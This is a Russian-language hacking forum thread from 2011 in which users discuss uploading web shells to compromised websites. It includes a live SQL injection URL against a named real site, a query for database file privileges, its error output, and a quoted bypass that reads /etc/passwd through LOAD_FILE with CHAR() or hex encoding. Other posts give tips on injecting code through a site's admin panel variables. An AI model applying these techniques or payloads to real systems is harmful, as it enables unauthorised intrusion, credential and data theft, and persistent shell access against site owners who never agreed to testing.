
31.07.2011, 18:41
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме: 2101094
Репутация:
672
|
|
Сообщение от Cherep
есть форум на vbulletin, можно ли какнибудь посмотреть(до расшифровки хешей), какие группы могут входить в админ панель?Точнее так, в какой таблице хранятся группы которые могут входить в админку
usergroupid=6
это группа админов, смотри в таблице user
|
|
|

01.08.2011, 01:57
|
|
Участник форума
Регистрация: 10.08.2009
Сообщений: 238
Провел на форуме: 724939
Репутация:
108
|
|
Привет. Интересует заливка шелла через БД.
Код HTML:
http://www.stpatsfc.com/news.php?id=-2839%20UNION%20SELECT%201,2,3,4,5,6,file_priv%20from%20mysql.user--
Выдает ошибку:
SELECT command denied to user 'stpatsf_admin'@'web6.novara.ie' for table 'user'
Получается, что невозможно выполнить SELECT ... INTO DUMPFILE 'бла-бла', и шелл залить нельзя? Максимум это слить базу?
|
|
|

01.08.2011, 02:44
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме: 2101094
Репутация:
672
|
|
Сообщение от =Zeus=
Привет. Интересует заливка шелла через БД.
Код HTML:
http://www.stpatsfc.com/news.php?id=-2839%20UNION%20SELECT%201,2,3,4,5,6,file_priv%20from%20mysql.user--
Выдает ошибку:
SELECT command denied to user 'stpatsf_admin'@'web6.novara.ie' for table 'user'
Получается, что невозможно выполнить SELECT ... INTO DUMPFILE 'бла-бла', и шелл залить нельзя? Максимум это слить базу?
через SQL запрос залить шелл не получится
|
|
|

02.08.2011, 00:34
|
|
Участник форума
Регистрация: 07.03.2008
Сообщений: 141
Провел на форуме: 405538
Репутация:
23
|
|
Сообщение от =Zeus=
SELECT command denied to user 'stpatsf_admin'@'web6.novara.ie' for table 'user'
Эта ошибка означает, что у текущего пользователя БД нет доступа к таблице mysql.user. Тем не менее при этом file_priv может быть Y. Но в данном случае экранируются кавычки, так что INTO DUMPFILE не сработает в любом случаем. MySQL там 5ой версии, слей названия таблиц, поищи админку и т.д.
|
|
|

02.08.2011, 03:56
|
|
Участник форума
Регистрация: 10.08.2009
Сообщений: 238
Провел на форуме: 724939
Репутация:
108
|
|
Сообщение от Nek1t
Но в данном случае экранируются кавычки, так что INTO DUMPFILE не сработает в любом случаем.
Думаю что кавычки это наименьшая из проблем там. Ведь у пользователя нету прав.
Странно, я почему-то думал, что Magic Quotes можно обойти. Правда опыта у меня не много, пока в основном читаю литературу. Например Bernardo Damele, ведущий разработчик sqlmap, пишет по этому поводу так (http://www.slideshare.net/inquis/sql-injection-not-only-and-11-updated):
Сообщение от None
PHP Magic Quotes bypass: Avoid single quotes
Example on MySQL:
LOAD_FILE('/etc/passwd') will be:
LOAD_FILE(CHAR(47,101,116,99,47,112,97, 115,115,119,100)) or LOAD_FILE(0x2f6574632f706173737764)
It is not limited to bypass only PHP Magic Quotes.
|
|
|

02.08.2011, 14:50
|
|
Познающий
Регистрация: 23.12.2009
Сообщений: 70
Провел на форуме: 641075
Репутация:
10
|
|
есть доступ в админку сайта, но не получается залить шелл.
через менеджер изображений не получается. есть возможность добавлять свои переменные на сайте в виде массива или переменной...
можно ли какой-нибудь код добавить,чтобы можно было как-то залиться шелл?
|
|
|

02.08.2011, 15:01
|
|
Постоянный
Регистрация: 13.10.2010
Сообщений: 375
Провел на форуме: 97332
Репутация:
38
|
|
Если есть доспут к админке - есть доступ к структуре. Можно залить нормальным образом.
|
|
|

02.08.2011, 15:11
|
|
Познающий
Регистрация: 23.12.2009
Сообщений: 70
Провел на форуме: 641075
Репутация:
10
|
|
если бы всё так на деле обстояло. переменные, которые уже забиты указывают в основом как выводить картинку, как показано меню и т.д. в хтмл форме.
|
|
|

02.08.2011, 16:40
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме: 2268
Репутация:
0
|
|
Сообщение от FoXuk
есть доступ в админку сайта, но не получается залить шелл.
через менеджер изображений не получается. есть возможность добавлять свои переменные на сайте в виде массива или переменной...
можно ли какой-нибудь код добавить,чтобы можно было как-то залиться шелл?
В двойных кавычках(С разрешением RG, или с не экранированием одинарных), или попробовать выйти за пределы переменной.
|
|
|

02.08.2011, 17:37
|
|
Участник форума
Регистрация: 07.03.2008
Сообщений: 141
Провел на форуме: 405538
Репутация:
23
|
|
Сообщение от =Zeus=
Думаю что кавычки это наименьшая из проблем там. Ведь у пользователя нету прав.
Странно, я почему-то думал, что Magic Quotes можно обойти.
Можно обойти, но INTO DUMPFILE требует именно кавычек и чистый путь без хекса и CHAR().
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|